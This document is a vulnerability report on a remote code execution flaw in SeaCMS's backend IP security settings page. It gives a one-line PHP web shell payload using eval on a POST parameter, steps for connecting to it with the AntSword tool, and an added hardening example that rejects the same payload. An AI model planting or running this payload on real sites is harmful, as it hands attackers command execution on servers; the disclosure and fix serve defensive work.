1、Vulnerability Description
1.1 Vulnerability Introduction
Testing found a remote code execution vulnerability in /augap/adminip.php: an attacker can insert malicious code into the input box of the backend IP security settings, and that code is then executed.
1.2 Problem Types
Remote code execution
1.3 Vulnerability Threat Level
High risk
1.4 Component Description
SeaCMS is a free, open-source website content management system written in PHP. This system is mainly designed to manage video on demand resources.
1.5 Scope of Impact
Full version of SeaCMS
2、Vulnerability Reproduction
Open the SeaCMS backend system.

Click System -> Background IP Security Settings.

Code entered in the input box is executed (RCE). The payload used:
Payload=127.0.01 "; @ eval ($_POST ["hacker"]);?>

Click Confirm; the page is updated.

Connect using the Chinese tool AntSword.

After the configuration is completed, the connection test succeeds.

Enter the virtual terminal; commands can now be executed.
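
The shape of the payload (it closes a double quote, then adds a statement) suggests that the submitted value is written into a PHP string that is later executed. The following is an added example, not SeaCMS code and not part of the original report: one way to harden such a settings handler is to accept only IP literals and to persist the list with var_export(). The function names, the file path and the newline/comma-separated input format are assumptions.

```php
<?php
// Added example, not SeaCMS code. Names, path and input format are assumptions.

/** Split the submitted list; return [validIps, rejectedEntries]. */
function parse_ip_allowlist(string $raw): array
{
    $valid = [];
    $rejected = [];
    foreach (preg_split('/[\r\n,]+/', $raw, -1, PREG_SPLIT_NO_EMPTY) as $entry) {
        $entry = trim($entry);
        if ($entry === '') {
            continue;
        }
        // Only IPv4/IPv6 literals pass; quotes, semicolons and PHP tags cannot.
        if (filter_var($entry, FILTER_VALIDATE_IP) !== false) {
            $valid[] = $entry;
        } else {
            $rejected[] = $entry;
        }
    }
    return [array_values(array_unique($valid)), $rejected];
}

/** Persist the list as data: var_export() escapes every value it emits. */
function save_ip_allowlist(string $path, array $ips): void
{
    $php = "<?php\nreturn " . var_export($ips, true) . ";\n";
    if (file_put_contents($path, $php, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $path");
    }
}

// Constructed sample submissions: one legitimate, one with the report's input.
$samples = [
    "127.0.0.1\n192.168.1.10",
    '127.0.01 "; @ eval ($_POST ["hacker"]);?>',
];
$target = sys_get_temp_dir() . '/ip_allowlist_demo.php'; // hypothetical path
foreach ($samples as $raw) {
    [$ips, $rejected] = parse_ip_allowlist($raw);
    if ($rejected !== []) {
        // Fail closed: write nothing when any entry is malformed.
        echo 'rejected: ' . count($rejected) . " invalid entry\n";
        continue;
    }
    save_ip_allowlist($target, $ips);
    $loaded = include $target;
    echo 'saved: ' . implode(', ', $loaded) . "\n";
}
```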




